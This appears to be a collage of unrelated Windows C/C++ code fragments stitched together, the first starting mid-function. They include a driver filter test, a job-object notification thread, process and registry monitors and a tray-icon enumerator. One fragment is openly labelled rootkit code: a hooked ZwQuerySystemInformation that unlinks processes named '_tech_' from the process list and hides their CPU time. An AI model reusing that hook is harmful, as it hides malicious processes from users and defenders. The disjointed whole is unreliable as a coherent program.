IDriverFilterTransmit(FltJob.m_hDevice, pFlt, pFlt, sizeof(FltTransmit), sizeof(FltTransmit))) { Log.AddToLog(L"Delete filter failed!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } pFlt->m_FltCtl = FLTCTL_RESET_FILTERS; if (FALSE == IDriverFilterTransmit(FltJob.m_hDevice, pFlt, pFlt, sizeof(FltTransmit), sizeof(FltTransmit))) { Log.AddToLog(L"Reset filter failed!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } if (WAIT_OBJECT_0 != WaitForSingleObject(hEventAppear, 1000 * 60 * 3)) // 3 min { Log.AddToLog(L"Error: change filter's queue not detected!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } } } #define _flt_timeout 20 /*sec*/ Log.AddToLog(L"checking filter with timeout..."); FILETIME STasFT; ULARGE_INTEGER ExpTime; GetSystemTimeAsFileTime(&STasFT); ExpTime.LowPart=STasFT.dwLowDateTime; ExpTime.HighPart=STasFT.dwHighDateTime; STasFT.dwLowDateTime=_flt_timeout; ExpTime.QuadPart=ExpTime.QuadPart+(LONGLONG)STasFT.dwLowDateTime * 6000000; //600000000 ULONG FltTimeout = AddFSFilter2(FltJob.m_hDevice, FltJob.m_AppID, gpModuleName, 5, FLT_A_INFO, FLTTYPE_FLT, 0, 0, *((__int64*)&ExpTime), PreProcessing, NULL, NULL); if (FltTimeout == 0) { Log.AddToLog(L"Error: add filter with timeout failed!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } else { pSingleParam->ParamFlags = _SINGLE_PARAM_FLAG_NONE; pSingleParam->ParamID = _PARAM_OBJECT_URL_W; lstrcpy((PWCHAR)pSingleParam->ParamValue, L"this is test filter with timeout..."); pSingleParam->ParamSize = (lstrlen((PWCHAR)pSingleParam->ParamValue) + 1) * sizeof(WCHAR); if (FALSE == IDriverFilterEvent(FltJob.m_hDevice, pSignleEvt, FALSE, &Verdict)) { Log.AddToLog(L"Error: check filter with timeout failed!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } else { Sleep((_flt_timeout + 1) * 1000); lstrcpy((PWCHAR)pSingleParam->ParamValue, L"Error: filter with timeout is present in queue after timeout!"); pSingleParam->ParamSize = (lstrlen((PWCHAR)pSingleParam->ParamValue) + 1) * sizeof(WCHAR); if (FALSE == IDriverFilterEvent(FltJob.m_hDevice, pSignleEvt, FALSE, &Verdict)) { Log.AddToLog(L"Error: check filter with timeout failed!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } } } while ((pEvt = gDrvEventList.GetFirst()) != NULL) { Log.AddToLog((PEVENT_TRANSMIT) pEvt); gDrvEventList.Free(pEvt); } // params and cache #define _test_params 20 BYTE pbParams[_test_params][sizeof(FILTER_PARAM) + 0x100]; ZeroMemory(pbParams, sizeof(pbParams)); if (!(_ERR_DRVFAULT_FLT & gDrvEventList.m_ErrorFlags)) { PFILTER_PARAM pArrFltParam[_test_params]; // dword - FLT_PARAM_AND, FLT_PARAM_EUA, FLT_PARAM_ABV, FLT_PARAM_BEL, FLT_PARAM_MORE, FLT_PARAM_LESS, FLT_PARAM_MASK, FLT_PARAM_EQU_LIST // string - FLT_PARAM_WILDCARD #define FltParam(_idx, _type, _value) { pArrFltParam[_idx] = (PFILTER_PARAM) pbParams[_idx];\ pArrFltParam[_idx]->m_ParamFlags = _FILTER_PARAM_FLAG_CACHABLE;\ pArrFltParam[_idx]->m_ParamFlt = _idx;\ pArrFltParam[_idx]->m_ParamID = _idx;\ pArrFltParam[_idx]->m_ParamSize = sizeof(_type);\ *(_type*)(pArrFltParam[_idx]->m_ParamValue) = _value;} FltParam(FLT_PARAM_AND, BYTE, 1); FltParam(FLT_PARAM_ABV, DWORD, 50001); FltParam(FLT_PARAM_BEL, DWORD, 50001); FltParam(FLT_PARAM_MORE, DWORD, 0x2000003); FltParam(FLT_PARAM_LESS, DWORD, 0x2000003); ULONG FltTimeout = AddFSFilter2(FltJob.m_hDevice, FltJob.m_AppID, gpModuleName, 5, FLT_A_INFO | FLT_A_SAVE2CACHE | FLT_A_USECACHE | FLT_A_RESETCACHE, FLTTYPE_FLT, 0, 0, 0, PreProcessing, NULL, pArrFltParam[FLT_PARAM_AND], pArrFltParam[FLT_PARAM_ABV], pArrFltParam[FLT_PARAM_BEL], pArrFltParam[FLT_PARAM_MORE], pArrFltParam[FLT_PARAM_LESS], NULL); if (FltTimeout == 0) { Log.AddToLog(L"Error: add filter with parameters failed!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } else { VERDICT VerdictOk, VerdictBad; pSingleParam->ParamFlags = _SINGLE_PARAM_FLAG_NONE; #define _check_flt_op(_str, _op, _type, _val1, _val2) Log.AddToLog(L"Checking flt op " _str L"...");\ pSingleParam->ParamID = _op;\ *(_type*)pSingleParam->ParamValue = _val1;\ pSingleParam->ParamSize = sizeof(_type);\ if (FALSE == IDriverFilterEvent(FltJob.m_hDevice, pSignleEvt, TRUE, &VerdictOk))\ VerdictOk = Verdict_Debug;\ *(_type*)pSingleParam->ParamValue = _val2;\ if (FALSE == IDriverFilterEvent(FltJob.m_hDevice, pSignleEvt, TRUE, &VerdictBad))\ VerdictBad = Verdict_Debug;\ if (VerdictOk != Verdict_Pass || VerdictBad != Verdict_NotFiltered)\ {\ Log.AddToLog(L"Flt operation" _str L" returned bad result");\ gDrvEventList.SetError(_ERR_DRVFAULT_FLT);\ } //+ ---------------------------------------------------------------------------------------- _check_flt_op(L"AND", FLT_PARAM_AND, BYTE, 1, 2); //+ ---------------------------------------------------------------------------------------- _check_flt_op(L"ABV", FLT_PARAM_ABV, DWORD, 50001, 50000); //+ ---------------------------------------------------------------------------------------- _check_flt_op(L"BEL", FLT_PARAM_BEL, DWORD, 50001, 50002); //+ ---------------------------------------------------------------------------------------- _check_flt_op(L"MORE", FLT_PARAM_MORE, DWORD, 0x2000003, 0x2000004); //+ ---------------------------------------------------------------------------------------- _check_flt_op(L"LESS", FLT_PARAM_LESS, DWORD, 0x2000003, 0x2000002); } } if (!(_ERR_DRVFAULT_FLT & gDrvEventList.m_ErrorFlags)) { pFlt->m_FltCtl = FLTCTL_RESET_FILTERS; if (FALSE == IDriverFilterTransmit(FltJob.m_hDevice, pFlt, pFlt, sizeof(FltTransmit), sizeof(FltTransmit))) { Log.AddToLog(L"Reset filter failed!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } } if (!(_ERR_DRVFAULT_FLT & gDrvEventList.m_ErrorFlags)) { PFILTER_PARAM pCacheParam = (PFILTER_PARAM) pbParams; pCacheParam->m_ParamFlags = _FILTER_PARAM_FLAG_CACHABLE; pCacheParam->m_ParamFlt = FLT_PARAM_WILDCARD; pCacheParam->m_ParamID = _PARAM_OBJECT_URL_W; lstrcpy((PWCHAR)pCacheParam->m_ParamValue, L"*"); pCacheParam->m_ParamSize = (lstrlen((PWCHAR)pCacheParam->m_ParamValue) + 1) * sizeof(WCHAR); ULONG FltCache = AddFSFilter2(FltJob.m_hDevice, FltJob.m_AppID, gpModuleName, 0, FLT_A_POPUP | FLT_A_SAVE2CACHE | FLT_A_USECACHE, FLTTYPE_FLT, 0, 0, 0, PreProcessing, NULL, pCacheParam, NULL); if (!FltCache) { Log.AddToLog(L"Error: can't add filter for checking cache!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } else { VERDICT Verdict1, Verdict2; pSignleEvt->ProcessingType = PreProcessing; pSingleParam->ParamFlags = _SINGLE_PARAM_FLAG_NONE; pSingleParam->ParamID = _PARAM_OBJECT_URL_W; lstrcpy((PWCHAR)pSingleParam->ParamValue, L"check cache (must be one such string in log!)"); pSingleParam->ParamSize = (lstrlen((PWCHAR)pSingleParam->ParamValue) + 1) * sizeof(WCHAR); if (FALSE == IDriverFilterEvent(FltJob.m_hDevice, pSignleEvt, FALSE, &Verdict1)) { Log.AddToLog(L"Error: check driver cache!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } else { if (FALSE == IDriverFilterEvent(FltJob.m_hDevice, pSignleEvt, FALSE, &Verdict2)) { Log.AddToLog(L"Error: check driver cache (second event)!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } else { if ((Verdict1 != Verdict_Pass) || (Verdict2 != Verdict_Pass)) { Log.AddToLog(L"Error: check driver cache failed!"); gDrvEventList.SetError(_ERR_DRVFAULT_FLT); } } } } } FltJob.ChangeActiveStatus(false); while ((pEvt = gDrvEventList.GetFirst()) != NULL) { Log.AddToLog((PEVENT_TRANSMIT) pEvt); gDrvEventList.Free(pEvt); } } } #endif //- //- ---------------------------------------------------------------------------------------- Log.AddToLog(L"\nTest finished."); if (gDrvEventList.m_Errors) { WCHAR err[128]; wsprintf(err, L"Errors %d, mask %x", gDrvEventList.m_Errors, gDrvEventList.m_ErrorFlags); Log.AddToLog(err); return gDrvEventList.m_ErrorFlags; } Log.AddToLog(L"\n\nNo errors."); return 0; }
/* This function is launched in a separate thread and waits for * a message from a completion port associated with a job. */ DWORD WINAPI JobNotify(PVOID) { TCHAR sz[2000]; BOOL fDone = FALSE; while (!fDone) { DWORD dwBytesXferred; ULONG_PTR CompKey; LPOVERLAPPED po; /* Attempts to dequeue an I/O completion packet * from the specified I/O completion port. * If there is no completion packet queued, the function * waits for a pending I/O operation associated with the completion port to complete. * * To dequeue multiple I/O completion packets at once, * use the GetQueuedCompletionStatusEx function * * CompletionPort [in] * A handle to the completion port. To create a completion port, * use the CreateIoCompletionPort function. * * lpNumberOfBytes [out] * A pointer to a variable that receives the number of bytes * transferred during an I/O operation that has completed * * lpCompletionKey [out] * A pointer to a variable that receives the completion key value * associated with the file handle whose I/O operation has completed. * A completion key is a per-file key that is specified in a call to CreateIoCompletionPort. * * lpOverlapped [out] * A pointer to a variable that receives the address of the * OVERLAPPED structure that was specified when the completed I/O operation was started. * * dwMilliseconds [in] * The number of milliseconds that the caller is willing to wait * for a completion packet to appear at the completion port. * If a completion packet does not appear within the specified time, * the function times out, returns FALSE, and sets *lpOverlapped to NULL. * * If dwMilliseconds is INFINITE, the function will never time out. * If dwMilliseconds is zero and there is no I/O operation to dequeue, * the function will time out immediately. */ GetQueuedCompletionStatus( g_hIOCP, &dwBytesXferred, &CompKey, &po, INFINITE); /* The app is shutting down, exit this thread */ fDone = (CompKey == COMPKEY_TERMINATE); HWND hwndLB = FindWindow(NULL, TEXT("Job Lab")); hwndLB = GetDlgItem(hwndLB, IDC_STATUS); if (CompKey == COMPKEY_JOBOBJECT) { _tcscpy_s(sz, _countof(sz), TEXT("--> Notification: ")); PTSTR psz = sz + _tcslen(sz); switch (dwBytesXferred) { /* We have reached an event when job time was reached */ case JOB_OBJECT_MSG_END_OF_JOB_TIME: StringCchPrintf( psz, _countof(sz) - _tcslen(sz), TEXT("Job time limit reached")); break; /* The time allowed for process in the job is exceeded. * So we get process name from the overlapped structure. */ case JOB_OBJECT_MSG_END_OF_PROCESS_TIME: { TCHAR szProcessName[MAX_PATH]; /* po is a process identifier. */ GetProcessName( PtrToUlong(po), szProcessName, MAX_PATH); StringCchPrintf( psz, _countof(sz) - _tcslen(sz), TEXT("Job process %s (Id=%d) time limit reached"), szProcessName, po); } break; case JOB_OBJECT_MSG_ACTIVE_PROCESS_LIMIT: StringCchPrintf( psz, _countof(sz) - _tcslen(sz), TEXT("Too many active processes in job")); break; case JOB_OBJECT_MSG_ACTIVE_PROCESS_ZERO: StringCchPrintf( psz, _countof(sz) - _tcslen(sz), TEXT("Job contains no active processes")); break; case JOB_OBJECT_MSG_NEW_PROCESS: { TCHAR szProcessName[MAX_PATH]; GetProcessName( PtrToUlong(po), szProcessName, MAX_PATH); StringCchPrintf( psz, _countof(sz) - _tcslen(sz), TEXT("New process %s (Id=%d) in Job"), szProcessName, po); } break; case JOB_OBJECT_MSG_EXIT_PROCESS: { TCHAR szProcessName[MAX_PATH]; GetProcessName( PtrToUlong(po), szProcessName, MAX_PATH); StringCchPrintf( psz, _countof(sz) - _tcslen(sz), TEXT("Process %s (Id=%d) terminated"), szProcessName, po); } break; case JOB_OBJECT_MSG_ABNORMAL_EXIT_PROCESS: { TCHAR szProcessName[MAX_PATH]; GetProcessName( PtrToUlong(po), szProcessName, MAX_PATH); StringCchPrintf( psz, _countof(sz) - _tcslen(sz), TEXT("Process %s (Id=%d) terminated abnormally"), szProcessName, po); } break; case JOB_OBJECT_MSG_PROCESS_MEMORY_LIMIT: { TCHAR szProcessName[MAX_PATH]; GetProcessName( PtrToUlong(po), szProcessName, MAX_PATH); StringCchPrintf( psz, _countof(sz) - _tcslen(sz), TEXT("Process (%s Id=%d) exceeded memory limit"), szProcessName, po); } break; case JOB_OBJECT_MSG_JOB_MEMORY_LIMIT: { TCHAR szProcessName[MAX_PATH]; GetProcessName( PtrToUlong(po), szProcessName, MAX_PATH); StringCchPrintf( psz, _countof(sz) - _tcslen(sz), TEXT("Process %s (Id=%d) exceeded job memory limit"), szProcessName, po); } break; default: StringCchPrintf( psz, _countof(sz) - _tcslen(sz), TEXT("Unknown notification: %d"), dwBytesXferred); break; } ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz)); /* Force a status update when a notification arrives */ CompKey = 1; } if (CompKey == COMPKEY_STATUS) { static int s_nStatusCount = 0; StringCchPrintf( sz, _countof(sz), TEXT("--> Status Update (%u)"), s_nStatusCount++); ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz)); /* Show the basic accounting information */ JOBOBJECT_BASIC_AND_IO_ACCOUNTING_INFORMATION jobai; g_job.QueryBasicAccountingInfo(&jobai); StringCchPrintf( sz, _countof(sz), TEXT("Total Time: User=%I64u, Kernel=%I64u ") TEXT("Period Time: User=%I64u, Kernel=%I64u"), jobai.BasicInfo.TotalUserTime.QuadPart, jobai.BasicInfo.TotalKernelTime.QuadPart, jobai.BasicInfo.ThisPeriodTotalUserTime.QuadPart, jobai.BasicInfo.ThisPeriodTotalKernelTime.QuadPart); ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz)); StringCchPrintf( sz, _countof(sz), TEXT("Page Faults=%u, Total Processes=%u, ") TEXT("Active Processes=%u, Terminated Processes=%u"), jobai.BasicInfo.TotalPageFaultCount, jobai.BasicInfo.TotalProcesses, jobai.BasicInfo.ActiveProcesses, jobai.BasicInfo.TotalTerminatedProcesses); ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz)); /* Show the I/O accounting information */ StringCchPrintf( sz, _countof(sz), TEXT("Reads=%I64u (%I64u bytes), ") TEXT("Write=%I64u (%I64u bytes), Other=%I64u (%I64u bytes)"), jobai.IoInfo.ReadOperationCount, jobai.IoInfo.ReadTransferCount, jobai.IoInfo.WriteOperationCount, jobai.IoInfo.WriteTransferCount, jobai.IoInfo.OtherOperationCount, jobai.IoInfo.OtherTransferCount); ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz)); /* Show the peak per-process and job memory usage */ JOBOBJECT_EXTENDED_LIMIT_INFORMATION joeli; g_job.QueryExtendedLimitInfo(&joeli); StringCchPrintf( sz, _countof(sz), TEXT("Peak memory used: Process=%I64u, Job=%I64u"), (__int64)joeli.PeakProcessMemoryUsed, (__int64)joeli.PeakJobMemoryUsed); ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz)); /* Show the set of Process IDs */ DWORD dwNumProcesses = 50; DWORD dwProcessIdList[50]; g_job.QueryBasicProcessIdList( dwNumProcesses, dwProcessIdList, &dwNumProcesses); StringCchPrintf( sz, _countof(sz), TEXT("PIDs: %s"), (dwNumProcesses == 0) ? TEXT("(none)") : TEXT("")); ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz)); TCHAR szProcessName[MAX_PATH]; for (DWORD x = 0; x < dwNumProcesses; x++) { GetProcessName( dwProcessIdList[x], szProcessName, _countof(szProcessName)); StringCchPrintf( sz, _countof(sz), TEXT(" %d - %s"), dwProcessIdList[x], szProcessName); ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz)); } } } return(0); }
NTSTATUS NewZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength ) { NTSTATUS rc; CHAR aProcessName[PROCNAMELEN]; GetProcessName( aProcessName ); DbgPrint("BHWIN: NewZwQuerySystemInformation() from %s\n", aProcessName); rc = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) ( SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength ); DbgPrint(" real ZwQuerySystemInfo returned %d", rc); if( NT_SUCCESS( rc ) ) { // double check the process name, if it starts w/ '_tech_' DO NOT // apply any stealth if(0 == memcmp(aProcessName, "_tech_", 6)) { DbgPrint("rootkit: detected system query from _tech_ process\n"); } else if( 5 == SystemInformationClass ) { // this is a process list, look for process names that start with // '_tech_' int iChanged = 0; struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation; struct _SYSTEM_PROCESSES *prev = NULL; while(curr) { //struct _SYSTEM_PROCESSES *next = ((char *)curr += curr->NextEntryDelta); ANSI_STRING process_name; RtlUnicodeStringToAnsiString( &process_name, &(curr->ProcessName), TRUE); if( (0 < process_name.Length) && (255 > process_name.Length) ) { if(0 == memcmp( process_name.Buffer, "_tech_", 6)) { ////////////////////////////////////////////// // we have a winner! ////////////////////////////////////////////// char _output[255]; char _pname[255]; memset(_pname, 0, 255); memcpy(_pname, process_name.Buffer, process_name.Length); DbgPrint( "rootkit: hiding process, pid: %d\tname: %s\r\n", curr->ProcessId, _pname); iChanged = 1; m_UserTime.QuadPart += curr->UserTime.QuadPart; m_KernelTime.QuadPart += curr->KernelTime.QuadPart; if(prev) { if(curr->NextEntryDelta) { // make prev skip this entry prev->NextEntryDelta += curr->NextEntryDelta; } else { // we are last, so make prev the end prev->NextEntryDelta = 0; } } else { if(curr->NextEntryDelta) { // we are first in the list, so move it forward (char *)SystemInformation += curr->NextEntryDelta; } else { // we are the only process! SystemInformation = NULL; } } } } else { //add the times of _root_* processes to the idle process curr->UserTime.QuadPart += m_UserTime.QuadPart; curr->KernelTime.QuadPart += m_KernelTime.QuadPart; m_UserTime.QuadPart = m_KernelTime.QuadPart = 0; } RtlFreeAnsiString(&process_name); if (0 == iChanged) prev = curr; else iChanged = 0; if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta); else curr = NULL; } } else if (8 == SystemInformationClass) //SystemProcessorTimes { struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation; times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart; } } return rc; }
// // Implements an event method //實現一個事件方法 // virtual void OnProcessEvent( PQUEUED_ITEM pQueuedItem, PVOID pvParam ) { TCHAR szFileName[MAX_PATH]; // // Deliberately I decided to put a delay in order to // demonstrate the queuing / multithreaded functionality //故意,我決定把以延遲 //演示排隊/多線程功能 // ::Sleep(500); // // Get the dummy parameter we passsed when we // initiated process of monitoring (i.e. StartMonitoring() ) //獲取參數,我們passsed當我們的假人 //啟動監測進程(即StartMonitoring()) // CWhatheverYouWantToHold* pParam = static_cast<CWhatheverYouWantToHold*>(pvParam); // // And it's about time to handle the notification itself //它的時間來處理的通知本身 // if (NULL != pQueuedItem) { TCHAR szBuffer[1024]; ::ZeroMemory( reinterpret_cast<PBYTE>(szBuffer), sizeof(szBuffer) ); GetProcessName( reinterpret_cast<DWORD>(pQueuedItem->hProcessId), szFileName, MAX_PATH ); if (pQueuedItem->bCreate) { // // At this point you can use OpenProcess() and // do something with the process itself //此時,您可以使用OpenProcess()和 //執行過程中的東西本身 // wsprintf( szBuffer, TEXT("Process has been created: PID=%.8X %s\n"), pQueuedItem->hProcessId, szFileName ); OutputDebugString(szBuffer); } else { wsprintf( szBuffer, TEXT("Process has been terminated: PID=%.8X\n"), pQueuedItem->hProcessId); OutputDebugString(szBuffer); } // // Output to the console screen //輸出到控制台屏幕 // _tprintf(szBuffer); } // if }
NTSTATUS RegistryCallback(IN PVOID CallbackContext, IN PVOID Argument1, IN PVOID Argument2) { NTSTATUS st=STATUS_SUCCESS; BOOLEAN exception = FALSE; BOOLEAN flag; int type; UNICODE_STRING registryPath; UCHAR* registryData = NULL; ULONG registryDataLength = 0; ULONG registryDataType = 0; /* Allocate a large 64kb string ... maximum path name allowed in windows */ registryPath.Length = 0; registryPath.MaximumLength = NTSTRSAFE_UNICODE_STRING_MAX_CCH * sizeof(WCHAR); registryPath.Buffer = ExAllocatePoolWithTag(NonPagedPool, registryPath.MaximumLength, REGISTRY_POOL_TAG); if(registryPath.Buffer == NULL) { return STATUS_SUCCESS; } //registryEvent.eventType = (REG_NOTIFY_CLASS)Argument1; type = (REG_NOTIFY_CLASS)Argument1; try { /* Large switch statement for all registry events ... fairly easy to understand */ switch(type) { case RegNtPreDeleteKey: { PREG_DELETE_KEY_INFORMATION deleteKey = (PREG_DELETE_KEY_INFORMATION)Argument2; PCM_KEY_BODY my_CM_KEY_BODY=(PCM_KEY_BODY)deleteKey->Object; GetProcessName(aProcessName); flag=GetRegistryObjectCompleteName(®istryPath, NULL, deleteKey->Object); if(flag) { RtlUnicodeStringToAnsiString(&astr,®istryPath,TRUE); DbgPrint("[RegCreated]ProcessID %d KeyName %s!\n",PID,astr.Buffer); st=WaitForUserAnswer(); if (!NT_SUCCESS(st)) return STATUS_INVALID_PARAMETER; RtlFreeAnsiString(&astr); } break; } case RegNtPreDeleteValueKey: { PREG_DELETE_VALUE_KEY_INFORMATION deleteValueKey = (PREG_DELETE_VALUE_KEY_INFORMATION)Argument2; PCM_KEY_BODY my_CM_KEY_BODY=(PCM_KEY_BODY)deleteValueKey->Object; GetProcessName(aProcessName); flag=GetRegistryObjectCompleteName(®istryPath, NULL, deleteValueKey->Object); if((flag) && (deleteValueKey->ValueName->Length > 0)) { RtlUnicodeStringCatString(®istryPath,L"\\"); RtlUnicodeStringCat(®istryPath, deleteValueKey->ValueName); RtlUnicodeStringToAnsiString(&astr,®istryPath,TRUE); DbgPrint("[RegCreated]ProcessID %d KeyName %s!\n",PID,astr.Buffer); st=WaitForUserAnswer(); if (!NT_SUCCESS(st)) return STATUS_INVALID_PARAMETER; RtlFreeAnsiString(&astr); } break; } case RegNtPreSetValueKey: { PREG_SET_VALUE_KEY_INFORMATION setValueKey = (PREG_SET_VALUE_KEY_INFORMATION)Argument2; PCM_KEY_BODY my_CM_KEY_BODY=(PCM_KEY_BODY)setValueKey->Object; GetProcessName(aProcessName); flag = GetRegistryObjectCompleteName(®istryPath, NULL, setValueKey->Object); if((flag) && (setValueKey->ValueName->Length > 0)) { registryDataType = setValueKey->Type; registryDataLength = setValueKey->DataSize; registryData = ExAllocatePoolWithTag(NonPagedPool, registryDataLength, REGISTRY_POOL_TAG); if(registryData != NULL) { RtlCopyBytes(registryData,setValueKey->Data,setValueKey->DataSize); } else { DbgPrint("RegistryMonitor: ERROR can't allocate memory for setvalue data\n"); } RtlUnicodeStringCatString(®istryPath,L"\\"); RtlUnicodeStringCat(®istryPath, setValueKey->ValueName); RtlUnicodeStringToAnsiString(&astr,®istryPath,TRUE); DbgPrint("[RegCreated]ProcessID %d KeyName %s!\n",PID,astr.Buffer); if (strstr(astr.Buffer,"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run")) { st=WaitForUserAnswer(); if (!NT_SUCCESS(st)) return STATUS_INVALID_PARAMETER; } else if (strstr(astr.Buffer,"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices")) { st=WaitForUserAnswer(); if (!NT_SUCCESS(st)) return STATUS_INVALID_PARAMETER; } else if (strstr(astr.Buffer," \\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce")) { st=WaitForUserAnswer(); if (!NT_SUCCESS(st)) return STATUS_INVALID_PARAMETER; } else if (strstr(astr.Buffer,"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run")) { st=WaitForUserAnswer(); if (!NT_SUCCESS(st)) return STATUS_INVALID_PARAMETER; } else if (strstr(astr.Buffer,"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce")) { st=WaitForUserAnswer(); if (!NT_SUCCESS(st)) return STATUS_INVALID_PARAMETER; } else if (strstr(astr.Buffer," \\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run")) { st=WaitForUserAnswer(); if (!NT_SUCCESS(st)) return STATUS_INVALID_PARAMETER; } else if (strstr(astr.Buffer,"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce")) { st=WaitForUserAnswer(); if (!NT_SUCCESS(st)) return STATUS_INVALID_PARAMETER; } RtlFreeAnsiString(&astr); } break; } default: break; } } except( EXCEPTION_EXECUTE_HANDLER ) { /* Do nothing if an exception occured ... event won't be queued */ exception = TRUE; } if(registryPath.Buffer != NULL) { ExFreePoolWithTag(registryPath.Buffer, REGISTRY_POOL_TAG); } /* Always return a success ... we aren't doing any filtering, just monitoring */ return STATUS_SUCCESS; }
tstring Helium::GetProcessString() { tostringstream result; result << GetProcessName() << "_" << GetCurrentProcessId() << "_" << GetCurrentThreadId(); return result.str(); }
int EnumAllVisibleTray_au() { wchar_t * pszText = NULL; DWORD lPID; int iconIndex = 0,iconNum = 0; wchar_t cPID[20] = {0}; int i = 0,j = 0; ICONINFO iconInfo; wchar_t cProcessName[1024] = L""; for(i = 0;i<100;i++) { if(g_QuickHideAllTray_au[i].trayicon.Reserved[0] == 22 && g_QuickHideAllTray_au[i].trayicon.Reserved[1] == 33) { DestroyIcon(g_QuickHideAllTray_au[i].trayicon.hIcon); } g_QuickHideAllTray_au[i].iHasTrayIcon = 0; g_QuickHideAllTray_au[i].iIconIndex = 0; g_QuickHideAllTray_au[i].iCommandId = 0; g_QuickHideAllTray_au[i].hWnd = NULL; g_QuickHideAllTray_au[i].trayicon.hIcon = NULL; g_QuickHideAllTray_au[i].trayicon.hwnd = NULL; g_QuickHideAllTray_au[i].trayicon.uID = 0; g_QuickHideAllTray_au[i].trayicon.uCallbackMessage = 0; g_QuickHideAllTray_au[i].bToBk = 0; g_QuickHideAllTray_au[i].lPID = 0; g_QuickHideAllTray_au[i].bHide = 0; g_QuickHideAllTray_au[i].bExist = 0; memset(g_QuickHideAllTray_au[i].cProcessName,0,30 * sizeof(wchar_t)); memset(g_QuickHideAllTray_au[i].cIconTip,0,1024 * sizeof(wchar_t)); //memset(g_QuickHideAllTray_au[i].cWndTitle,0,2048 * sizeof(wchar_t)); } GetWindowThreadProcessId(hTrayWnd,&lPID); CProcessData<TBBUTTON> data(lPID); TBBUTTON tb = {0}; TRAYDATA tray = {0}; TrayItemInfo tifo = {0}; wchar_t Tipwchar_t = 0; wchar_t sTip[1024] = L"\0"; wchar_t* pTip = NULL; int x = 0,iRet = 0; j = 0; int iBtnCount = SendMessage(hTrayWnd,TB_BUTTONCOUNT,0,0); DWORD lExID = 0; for(i=0; i < iBtnCount;i++) { if (i <= 100) { } else { break; } SendMessage(hTrayWnd,TB_GETBUTTON,i,(LPARAM)data.GetData()); data.ReadData(&tb); data.ReadData(&tray,(void * )tb.dwData); if (!(tb.fsState & TBSTATE_HIDDEN)) { GetWindowThreadProcessId(tray.hwnd,&lPID); if(lPID == GetCurrentProcessId()) { continue; } memset(&iconInfo,0,sizeof(iconInfo)); if(GetIconInfo(tray.hIcon,&iconInfo) == 0) { DWORD dwErr = GetLastError(); tray.hIcon = hIcon_Unknown; //GetProcessTrayIcon(lPID,&tb,&tray); } if(iconInfo.hbmColor != NULL) { DeleteObject(iconInfo.hbmColor); } if(iconInfo.hbmMask != NULL) { DeleteObject(iconInfo.hbmMask); } g_QuickHideAllTray_au[j].bHide = tb.idCommand;//Use this member save idcommand for hide or show g_QuickHideAllTray_au[j].cWndTitle = NULL; //g_QuickHideAllTray_au[j].cIconTip = new wchar_t[1024]; //memset(g_QuickHideAllTray_au[j].cIconTip,0,1024 * sizeof(wchar_t)); memset(g_QuickHideAllTray_au[j].cProcessName,0,30 * sizeof(wchar_t)); GetWindowThreadProcessId(hTrayWnd,&lExID); if(lExID == lPID) { wcscpy(g_QuickHideAllTray_au[j].cProcessName,L"explorer.exe"); } //g_QuickHideAllTray_au[j].trayicon = tray; g_QuickHideAllTray_au[j].trayicon.hIcon = tray.hIcon; g_QuickHideAllTray_au[j].trayicon.hwnd = tray.hwnd; g_QuickHideAllTray_au[j].trayicon.Reserved[0] = tray.Reserved[0]; g_QuickHideAllTray_au[j].trayicon.Reserved[1] = tray.Reserved[1]; g_QuickHideAllTray_au[j].trayicon.uCallbackMessage = tray.uCallbackMessage; g_QuickHideAllTray_au[j].trayicon.uID = tray.uID; g_QuickHideAllTray_au[j].lPID = lPID; g_QuickHideAllTray_au[j].hWnd = NULL; g_QuickHideAllTray_au[j].Next = NULL; memset(sTip,0,1024*(sizeof(wchar_t))); x = 0; pTip = (wchar_t*)tb.iString; do { if(x >= 1000) { wcscpy(sTip,L"[ToolTip was either too long or not set]"); break; } data.ReadData_Tip((wchar_t*)&Tipwchar_t, (void *)pTip++); }while( x < 1000 && (sTip[x++] = Tipwchar_t)); iRet = 0; wcscpy(g_QuickHideAllTray_au[j].cIconTip,sTip); { memset(cProcessName,0,1024*sizeof(wchar_t)); GetProcessName(lPID,cProcessName); if(wcscmp(cProcessName,L"flashget.exe") == 0) { int j = 0; } int bInList = IsInAutoHideList(cProcessName); if(bInList == 1) { BKThisIcon(g_QuickHideAllTray_au + j); } } j ++; } } return 1; }
